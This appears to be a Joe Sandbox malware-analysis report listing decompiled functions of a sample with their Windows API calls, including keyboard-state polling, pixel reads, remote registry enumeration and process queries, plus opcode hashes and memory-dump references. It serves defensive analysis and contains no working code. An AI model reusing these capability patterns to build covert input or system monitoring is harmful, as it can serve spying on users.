Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: e580c0a022948fa373dc6ca5e2ab8dffc9b3e8ddd38e6f9146a06fd638a445d4
Instruction ID: 65bdd591bfa6aeb9de7a45a8b95b8d06aea900243ac270f12451874e2326c1d9
Opcode Fuzzy Hash: e580c0a022948fa373dc6ca5e2ab8dffc9b3e8ddd38e6f9146a06fd638a445d4
Instruction Fuzzy Hash: DF217470A10209AFCB10EF65DC85DAEB7B8EF49704B108069F905D7252DB71EE55CF61

Function 0025AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

Part of subcall function 0025AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0025AA6F
Part of subcall function 0025AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0025AA82
Part of subcall function 0025AA52: GetCurrentThreadId.KERNEL32 ref: 0025AA89
Part of subcall function 0025AA52: AttachThreadInput.USER32(00000000), ref: 0025AA90

GetFocus.USER32 ref: 0025AC2A

Part of subcall function 0025AA9B: GetParent.USER32(?), ref: 0025AAA9

GetClassNameW.USER32(?,?,00000100), ref: 0025AC73
EnumChildWindows.USER32(?,0025ACEB), ref: 0025AC9B
__swprintf.LIBCMT ref: 0025ACB5

Strings

%s%d, xrefs: 0025ACAF

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 7db5eb245251e7113196b4c12a480087dbb32a67cbbf91491237621a410fbf19
Instruction ID: c2c2ecb47785eeb7afa5c968ed4a9af70e227e99f31b07e8b0f675f5b5341077
Opcode Fuzzy Hash: 7db5eb245251e7113196b4c12a480087dbb32a67cbbf91491237621a410fbf19
Instruction Fuzzy Hash: BD11D5756102096BDF11BFA09D86FEA377CAB48711F004076FE089A142DA705969CF75

Function 002622E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00262318

Strings

APPEND, xrefs: 00262351
KEYS, xrefs: 0026232F
EXISTS, xrefs: 00262340
REMOVE, xrefs: 0026231E

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 363ea2c823cb3483e825f00c6288f002a083d690dd86ad976ec2702bb0dce44a
Instruction ID: 540cb6ed5480bbbf6ec4a07d612da456215cb143742229fd44edfe46e41cf45c
Opcode Fuzzy Hash: 363ea2c823cb3483e825f00c6288f002a083d690dd86ad976ec2702bb0dce44a
Instruction Fuzzy Hash: 55112A3092012ADF8F00EF94D9914EEB7B8FF1A344B2044A9D81467262EB766D6ACF50

Function 0027F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0027F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0027F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0027F453
CloseHandle.KERNEL32(?), ref: 0027F4D4

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 7cc866c31a7ff78e161e053074bc2a4a1a10dd73990149fdd34c03b32b47259d
Instruction ID: 1ef7e478953b2b21560693cd2624deb8a69e78e7238c8c84a5d96b17d63b406e
Opcode Fuzzy Hash: 7cc866c31a7ff78e161e053074bc2a4a1a10dd73990149fdd34c03b32b47259d
Instruction Fuzzy Hash: 948191B16243019FD720EF28D886B2AB7E5AF44710F14C91DFA99DB2D2D7B0AC508F91

Function 00280697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00211A36: _memmove.LIBCMT ref: 00211A77

Part of subcall function 0028147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0028040D,?,?), ref: 00281491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0028075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0028079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002807E3
RegCloseKey.ADVAPI32(?,?), ref: 0028080F
RegCloseKey.ADVAPI32(00000000), ref: 0028081C

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: b114d8a0d0f61d3ceed1e68a5416bd0b231479f040245054f1d33da2ca785e44
Instruction ID: 3dbfa6847904af746ec475ab7ada23006536f13c27d53d2333e37cd05c9b4660
Opcode Fuzzy Hash: b114d8a0d0f61d3ceed1e68a5416bd0b231479f040245054f1d33da2ca785e44
Instruction Fuzzy Hash: F6517C71228205AFC714EF64C881F6AB7E9BF84304F00891DF59587292DB30ED68CF52

Function 0026EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0026EC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0026EC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0026ECCA

Part of subcall function 00204D37: __itow.LIBCMT ref: 00204D62
Part of subcall function 00204D37: __swprintf.LIBCMT ref: 00204DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0026ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0026ECF7

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: be8b58bf3372181a1b2127708001bf3d019091eba8ac7242c9a021b430f88352
Instruction ID: 75d5045689984a500d036cbd79f21aef4efba715bbc0bb942b2c94f2e0971e26
Opcode Fuzzy Hash: be8b58bf3372181a1b2127708001bf3d019091eba8ac7242c9a021b430f88352
Instruction Fuzzy Hash: DC513B75A10219EFCB01EF64D9859AEBBF5EF08314B148095E909AB3A2CB31ED61DF50

Function 0028A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a83d413125419f027f68e5477dfb262fb980111b9277a9ef9a0b2f27c686d7f
Instruction ID: c3773c7c72c2a73ba925f89186c015efd7896d8e931bb256ad1cde19be1c374e
Opcode Fuzzy Hash: 3a83d413125419f027f68e5477dfb262fb980111b9277a9ef9a0b2f27c686d7f
Instruction Fuzzy Hash: 1141F639922115AFE710EF24CC88FADFBB8EB09310F140167E916A72D1CB70AD61EB51

Function 00202714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00202727
ScreenToClient.USER32(002C77B0,?), ref: 00202744
GetAsyncKeyState.USER32(00000001), ref: 00202769
GetAsyncKeyState.USER32(00000002), ref: 00202777

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8bc084d8d8bd05f7b8bbb83c212cfef40655ae1e7b81bf21bbf9da7c29cae717
Instruction ID: 084e7a7532a72417aeb0e44c01f2238c1de4000ae106c64bb4ec697076364eb0
Opcode Fuzzy Hash: 8bc084d8d8bd05f7b8bbb83c212cfef40655ae1e7b81bf21bbf9da7c29cae717
Instruction Fuzzy Hash: 8141207552421AFFDF159F64C848AE9FB74FB05324F20435AF824A62E1C7309964DF91

Function 002595D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 002595E8
PostMessageW.USER32(?,00000201,00000001), ref: 00259692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0025969A
PostMessageW.USER32(?,00000202,00000000), ref: 002596A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002596B0

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 672e2ab958205654f66fc961e2cdfb80ba7c37c93fd1d9c2a039101297bc0400
Instruction ID: 982c759aa79922b263afc9f48449ae98e48e067afc73359f7d4e0bb037d88c2f
Opcode Fuzzy Hash: 672e2ab958205654f66fc961e2cdfb80ba7c37c93fd1d9c2a039101297bc0400
Instruction Fuzzy Hash: 0831DF7190021AEFDF14CF68D98CA9E3BB9FB44316F104219FD24AB1D0C3B09968DB94

Function 0025BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0025BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0025BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0025BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0025BE18
_wcsstr.LIBCMT ref: 0025BE22

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 0b2bd8e7cb6dfdc5b3f37975188df63692c64b652d25320c460186c9bd90d4ca
Instruction ID: a22b619fdbbb48a9533e2c710960ee373bb92a0bbf72efd8acf2a7a2caec2edf
Opcode Fuzzy Hash: 0b2bd8e7cb6dfdc5b3f37975188df63692c64b652d25320c460186c9bd90d4ca
Instruction Fuzzy Hash: E5214C32214204BFEB265F75AC4AE7B7BACDF49710F10402AFD08CA091DB71DC609664

Function 0028B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 002029E2: GetWindowLongW.USER32(?,000000EB), ref: 002029F3

GetWindowLongW.USER32(?,000000F0), ref: 0028B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0028B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0028B841
GetSystemMetrics.USER32(00000004), ref: 0028B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0027155C,00000000), ref: 0028B888

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: add3aa79dfea53983e5d922a64701eef703b1dbf51fc1833fe8091faf2dfe4c6
Instruction ID: 82f5cc080b326bdc20e3edeef7b6d42ad4d2aa1dbbe2cf98ef4d6a77f18046f1
Opcode Fuzzy Hash: add3aa79dfea53983e5d922a64701eef703b1dbf51fc1833fe8091faf2dfe4c6
Instruction Fuzzy Hash: 4721A13592521AAFCB11AF389C4CB6A7BA8FB05721F15473DF921D72E0D7309820DB80

Function 00259EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00259ED8

Part of subcall function 00211821: _memmove.LIBCMT ref: 0021185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00259F0A
__itow.LIBCMT ref: 00259F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00259F4A
__itow.LIBCMT ref: 00259F5B

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 234d659e7ec165b06e34239f5e7b48089dfcac880f43af893f56d06e4004cbb6
Instruction ID: 64e1416f46bad8e94bf083e6d0ead0b47df1b39cbd4ad72be4a89dfdda32dc20
Opcode Fuzzy Hash: 234d659e7ec165b06e34239f5e7b48089dfcac880f43af893f56d06e4004cbb6
Instruction Fuzzy Hash: 1121B631620209BFDB109F949C8AEEE7BACEB95721F144025FE01D7141D670C9A59BE5

Function 00276138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00276159
GetForegroundWindow.USER32 ref: 00276170
GetDC.USER32(00000000), ref: 002761AC
GetPixel.GDI32(00000000,?,00000003), ref: 002761B8
ReleaseDC.USER32(00000000,00000003), ref: 002761F3

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 7babf55085d6284bec9f9d1ce36c7c27115307c811fedc7978499f18c43a9e7b
Instruction ID: 3dc2b162da8576bca80e982cc44cdfd49dc9d4a3b38d87a404e8d0361e0fd292
Opcode Fuzzy Hash: 7babf55085d6284bec9f9d1ce36c7c27115307c811fedc7978499f18c43a9e7b
Instruction Fuzzy Hash: 12216276A106049FD714EF65DD88AAABBF9EF48310F04C469E94A97352CB30AD50CF90

Function 002016CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00201729
SelectObject.GDI32(?,00000000), ref: 00201738
BeginPath.GDI32(?), ref: 0020174F
SelectObject.GDI32(?,00000000), ref: 00201778

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: bb7e562129101cae170dbad574b1fce8b4e6eb01e06880c26f1e6c6ecc167f9d
Instruction ID: 1e1af16929f07410492b0df07157f0b956c49fa7c79c8c69fc8b42b0cfcc1f97
Opcode Fuzzy Hash: bb7e562129101cae170dbad574b1fce8b4e6eb01e06880c26f1e6c6ecc167f9d
Instruction Fuzzy Hash: BC219A30824309EFDB119F29FC4CB69BBA8AB00321F144316FA15961F1D7B198B1DF90

Function 0025C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 0025C84C
_memcmp.LIBCMT ref: 0025C86A
_memcmp.LIBCMT ref: 0025C87D
_memcmp.LIBCMT ref: 0025C895
_memcmp.LIBCMT ref: 0025C8AD

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f5b9b9cf4c051c74206ff1a1d8e4bd69c54df0f4460c17fc80364568b143bd34
Instruction ID: 108b189fbd999167477e460b82cdfd17dc40cf9db01662b00f7c5a25fbb2b286
Opcode Fuzzy Hash: f5b9b9cf4c051c74206ff1a1d8e4bd69c54df0f4460c17fc80364568b143bd34
Instruction Fuzzy Hash: 7B01D6726302153FD601A9109C46FBB635C9E31356F144025FD06A6641F7B0DF3885E8

Function 0026504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00265075
__beginthreadex.LIBCMT ref: 00265093
MessageBoxW.USER32(?,?,?,?), ref: 002650A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002650BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002650C5

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: fcec51156688afcfe9570af0239ad606e5cbadcb2fc47d2492d71ba8b17a4aa6
Instruction ID: 03d5cce426c40ba40f379274ae4ac6cb5281e814a800c3e2ad5b58f0e33bc6e7
Opcode Fuzzy Hash: fcec51156688afcfe9570af0239ad606e5cbadcb2fc47d2492d71ba8b17a4aa6
Instruction Fuzzy Hash: 71110872918618BFC7019FB8AC4CA9B7BACEB45320F140256FC15D3390D6718D548BF1

Function 00258E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00258E3C
GetLastError.KERNEL32(?,00258900,?,?,?), ref: 00258E46
GetProcessHeap.KERNEL32(00000008,?,?,00258900,?,?,?), ref: 00258E55
HeapAlloc.KERNEL32(00000000,?,00258900,?,?,?), ref: 00258E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00258E73

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_200000_Predicted.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: a0fa9d9724994713947a4837e32a06e2c361adc7d46e8e51f8401ddd2d21f7ef
Instruction ID: b279c8c130484ffabc84919c28ea921bebb1ed343ba359c8b2a5661d9208a423
Opcode Fuzzy Hash: a0fa9d9724994713947a4837e32a06e2c361adc7d46e8e51f8401ddd2d21f7ef
Instruction Fuzzy Hash: 07018171210209BFDB214FA5EC8DD6B7FBDEF89365B10056AFC49D2220DB719C14CA64

Function 002657FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0026581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00265829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00265831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0026583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00265877

Memory Dump Source

Source File: 00000012.00000002.4060834230.0000000000201000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00200000, based on PE: true

Associated: 00000012.00000002.4060758244.0000000000200000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.0000000000290000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4062745934.00000000002B6000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063444901.00000000002C0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000012.00000002.4063526764.00000000002C9000.00000002.00000001.01000000.0000000B.sdmpDownload File

